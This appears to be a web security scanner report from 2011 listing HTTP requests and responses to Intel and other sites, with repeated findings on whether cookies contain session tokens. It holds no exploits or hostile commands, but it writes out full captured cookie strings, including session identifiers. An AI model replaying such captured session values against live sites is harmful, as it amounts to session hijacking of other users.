GET /sites/sitewide/survey/pix/ HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 404 Not Found Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Expires: Sat, 05 Feb 2011 23:17:54 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 05 Feb 2011 23:17:54 GMT Content-Length: 18367 Connection: close Set-Cookie: ASPSESSIONIDCSQQQQAT=FFJMGNPAIJEEEOOJKAPKMMCC; path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- IMPORTANT NOTE TO WEB AUTHORS UPDATING THIS PAGE: Do NOT use .inc files for the header a ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /support/index.htm HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 301 Moved Permanently Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Location: http://www.intel.com/p/en_US/support Content-Length: 0 Content-Type: text/html Vary: Accept-Encoding Expires: Sat, 05 Feb 2011 23:19:27 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 05 Feb 2011 23:19:27 GMT Connection: close Set-Cookie: ASPSESSIONIDCSQQQQAT=PBLMGNPAJLKHIKLEOCNIAMDH; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /technology/index.htm HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 301 Moved Permanently Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Location: http://www.intel.com/p/en_US/business/technology Content-Length: 0 Content-Type: text/html Vary: Accept-Encoding Expires: Sat, 05 Feb 2011 23:19:30 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 05 Feb 2011 23:19:30 GMT Connection: close Set-Cookie: ASPSESSIONIDCSQQQQAT=IDLMGNPAAIMCIBFOEFKLJCND; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /th/business/index.htm?iid=gg_th_TH+noscript HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 301 Moved Permanently Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Location: http://www.intel.com/p/en_US/business?iid=gg_th_TH+noscript Content-Length: 21 Content-Type: text/html Vary: Accept-Encoding Expires: Sat, 05 Feb 2011 23:19:19 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 05 Feb 2011 23:19:19 GMT Connection: close Set-Cookie: ASPSESSIONIDCSQQQQAT=ENKMGNPAPICCNDAAEMFFPIGO; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /th/business/index.htm HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 301 Moved Permanently Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Location: http://www.intel.com/p/en_US/business Content-Length: 0 Content-Type: text/html Vary: Accept-Encoding Expires: Sat, 05 Feb 2011 23:19:19 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 05 Feb 2011 23:19:19 GMT Connection: close Set-Cookie: ASPSESSIONIDSACRDDSC=KGMFCODAOIPNDJJPKLNMMINE; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /tw/business/index.htm HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 301 Moved Permanently Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Location: http://www.intel.com/p/en_US/business Content-Length: 0 Content-Type: text/html Vary: Accept-Encoding Expires: Sat, 05 Feb 2011 23:19:09 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 05 Feb 2011 23:19:09 GMT Connection: close Set-Cookie: ASPSESSIONIDSACRDDSC=BFMFCODAJMIMBANGGBBJIHEF; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /licenses/mit-license.php HTTP/1.1 Host: www.opensource.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /<BR/ HTTP/1.1 Host: www.sigcse.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 23:15:20 GMT Server: Apache/2.2.11 (Unix) DAV/2 PHP/5.2.9 SVN/1.6.2 mod_ssl/2.2.11 OpenSSL/0.9.7a mod_jk/1.2.26 mod_python/3.3.1 Python/2.4.4 X-Powered-By: PHP/5.2.9 Expires: Sun, 19 Nov 1978 05:00:00 GMT Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0 Set-Cookie: SESS01751fc7542c8565e6d3f32029062982=efohpkcr1poe9o8iif13jis6f0; expires=Tue, 01-Mar-2011 02:48:40 GMT; path=/; domain=.sigcse.org Last-Modified: Sat, 05 Feb 2011 23:15:20 GMT Content-Type: text/html; charset=utf-8 Connection: close Content-Length: 10731
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr"> <head> <meta ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /-/spec/opensearch/1.1/ HTTP/1.1 Host: a9.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:17:15 GMT Server: Server Content-Type: text/html; charset=utf-8 Content-Length: 2727 Set-Cookie: a9locale=en_US; Domain=.a9.com; Path=/ Set-Cookie: a9Temp="{\"w\":\"m\"}"; Version=1; Domain=.a9.com; Path=/ Vary: Accept-Encoding,User-Agent Connection: close
<html> <head>
<script language="javascript" type="text/javascript"> <!-- var a9IsIE7 = true; var a9IsIE = true; var a9IsMoz = false; var a9IsSafari = false; var a9IsOpera = false;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /p/simplemodal/ HTTP/1.1 Host: code.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /p/swfobject/ HTTP/1.1 Host: code.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /submit HTTP/1.1 Host: digg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /default.aspx HTTP/1.1 Host: downloadcenter.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 05 Feb 2011 23:17:39 GMT Server: Microsoft-IIS/6.0 P: S1 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=qsaw3eedfpygrc45av4jmmm4; path=/; HttpOnly Set-Cookie: IntelDownloadCenterLocale=en-US; expires=Sun, 05-Feb-2012 23:17:39 GMT; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 22403 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" dir=" ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /details?v=i73f0pQBfQ8 HTTP/1.1 Host: m.youtube.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /community/de_de HTTP/1.1 Host: newsroom.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947627821; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; countrylang=United%20States%20-%20English; s_sq=intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA%26intelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; jive.recentHistory.-1=31342c323031363b; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; s_lv_s=Less%20than%201%20day; gpv_p18=corp%3Anewsroom/community/intel_newsroom/%3Fiid%3Dftr%2Bpress; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=174403261; cf=0; __utmb=174403261.3.10.1296947569;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /community/en_eu/ HTTP/1.1 Host: newsroom.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947627821; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; countrylang=United%20States%20-%20English; s_sq=intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA%26intelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; jive.recentHistory.-1=31342c323031363b; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; s_lv_s=Less%20than%201%20day; gpv_p18=corp%3Anewsroom/community/intel_newsroom/%3Fiid%3Dftr%2Bpress; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=174403261; cf=0; __utmb=174403261.3.10.1296947569;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /community/en_ie HTTP/1.1 Host: newsroom.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947627821; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; countrylang=United%20States%20-%20English; s_sq=intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA%26intelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; jive.recentHistory.-1=31342c323031363b; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; s_lv_s=Less%20than%201%20day; gpv_p18=corp%3Anewsroom/community/intel_newsroom/%3Fiid%3Dftr%2Bpress; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; 